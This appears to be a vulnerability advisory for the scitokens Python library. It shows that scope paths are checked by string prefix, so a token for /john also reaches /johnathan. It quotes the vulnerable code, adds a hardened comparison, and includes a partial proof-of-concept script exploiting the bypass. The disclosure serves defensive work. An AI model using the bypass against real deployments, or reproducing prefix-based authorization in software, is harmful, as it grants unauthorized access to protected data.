The Enforcer validates scope paths using a plain string prefix match (startswith). As a result, a token scoped to a specific path (e.g., /john) can also access sibling paths that merely start with the same characters (e.g., /johnathan, /johnny), which is an Authorization Bypass.
File: src/scitokens/scitokens.py
Methods: _validate_scp and _validate_scope
In _validate_scp (around line 696):

    for scope in value:
        authz, norm_path = self._check_scope(scope)
        if (self._test_authz == authz) and norm_requested_path.startswith(norm_path):
            return True

In _validate_scope (around line 722):

    for scope in value.split(" "):
        authz, norm_path = self._check_scope(scope)
        if (self._test_authz == authz) and norm_requested_path.startswith(norm_path):
            return True
If norm_path (the authorized path) is /john and norm_requested_path (the requested path) is /johnathan, startswith returns True and access is incorrectly granted.
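The following is an added illustration, not code from the report or from the scitokens project: it places the vulnerable prefix check beside a path-component check that only grants access when the authorized path equals the requested path or is one of its directory ancestors, and applies it to a space-separated scope claim the way _validate_scope iterates over scopes. The function names prefix_match, component_match and scope_allows are assumptions made for this example, and treating a scope with no path as covering "/" is an assumption as well.

```python
import posixpath


def _normalize(path):
    # Anchor at "/" and collapse "." / ".." / duplicate slashes so that
    # traversal such as /john/../johnny is compared in its resolved form.
    return posixpath.normpath("/" + path.lstrip("/"))


def prefix_match(requested, authorized):
    """Vulnerable check, mirroring the report: a bare string prefix test."""
    return _normalize(requested).startswith(_normalize(authorized))


def component_match(requested, authorized):
    """Hardened check: authorized path must be the requested path itself or a
    directory ancestor of it, so /john covers /john and /john/file but not
    /johnathan."""
    req = _normalize(requested)
    auth = _normalize(authorized)
    if auth == "/":
        return True  # root scope covers everything
    return req == auth or req.startswith(auth + "/")


def scope_allows(scope_claim, authz, requested_path):
    """Evaluate a space-separated scope claim such as "read:/john write:/data"
    (the form split on " " in _validate_scope) using component_match.
    A scope without a path (e.g. "read") is assumed to mean "read:/"."""
    for scope in scope_claim.split():
        scope_authz, _, scope_path = scope.partition(":")
        if scope_authz != authz:
            continue
        if component_match(requested_path, scope_path or "/"):
            return True
    return False


if __name__ == "__main__":
    # Constructed sample requests against a token scoped to read:/john.
    for requested in ["/john", "/john/file", "/johnathan", "/john/../johnny"]:
        print(f"{requested:18} prefix_match={prefix_match(requested, '/john')!s:5} "
              f"component_match={component_match(requested, '/john')}")
```

Running the block shows prefix_match granting /johnathan and the traversal form /john/../johnny (which normalizes to /johnny), while component_match grants only /john and /john/file. Any fix along these lines should keep the normalization step in front of the comparison, otherwise ".." segments reopen the same sibling-path problem.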
    import scitokens
    import sys

    def poc_scope_bypass():
        """
        Demonstrate an Authorization Bypass vulnerability in scope path checking.
        """
        print("--- PoC: Incorrect Scope Path Checking (Authorization Bypass) ---")
        issuer = "https://scitokens.org/unittest"
        enforcer = scitokens.Enforcer(issuer)

        # Create a token with access to /john
        token = scitokens.SciToken()
        token['iss'] = issuer
        token['scope'] = "read:/john"
        print(f"Authorized path in scope: /john")

        # 1. Test access to /john/file (should be allowed)
        print(f"[1] Testing legitimate subpath: /john/file")
        if enforcer.test(token, 'read', '/john/file'):
            print(" -> Access GRANTED (Correct behavior)")
        else:
            print(" -> Access DENIED (Incorrect behavior - should have access to subpaths)")

        # 2. Test access to /johnathan (SHOULD BE...
1.9.6
CVSS 3.1 base score: 8.1 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)